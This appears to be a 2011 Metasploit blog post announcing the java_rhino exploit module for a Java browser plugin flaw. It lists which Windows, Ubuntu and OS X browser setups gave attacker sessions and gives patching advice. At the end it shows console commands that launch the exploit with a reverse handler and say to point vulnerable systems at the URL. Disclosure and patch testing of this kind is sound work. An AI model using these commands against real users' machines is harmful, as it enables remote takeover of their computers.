jcran

Exploit for critical Java vulnerability added to Metasploit

Blog Post created by jcran on Nov 30, 2011

@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one.  To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running java, you can use  this link, and click “Do I have Java?”  below the big red 'Free Java Download' button."

 

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited.

 

Microsoft Windows:

 

Both Windows XP and Windows 7 were tested for vulnerability, a session was generated in every browser that was tested when the system was running java versions prior to the latest. Note that Chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

 

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Ubuntu Linux:

 

Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable.

 

An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395 .html - However, even after following these instructions, i was unable to get this process to work, and simply disabled java on the vulnerable device.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not, however, when i went to disable the plugin, i noticed that the 'update' button lead me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

 

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories

Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories

Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin

 

Apple OS X:

 

Interesting issue here, I was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

 

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Testing for the java_rhino vulnerability:

 

You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers, it will be available in the Pro / Express / Community product later today.


msf  exploit(handler) > use exploit/multi/browser/java_rhino

msf  exploit(java_rhino) > info

msf  exploit(java_rhino) > set URIPATH xxxx

msf  exploit(java_rhino) > exploit

 

[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.11:4444

[*] Using URL: hxxp://0.0.0.0:8080/xxxx

[*]  Local IP: hxxp://10.0.0.11:8080/xxxx

[*] Server started.

 

Point vulnerable systems at the URL, and wait for your sessions.

Outcomes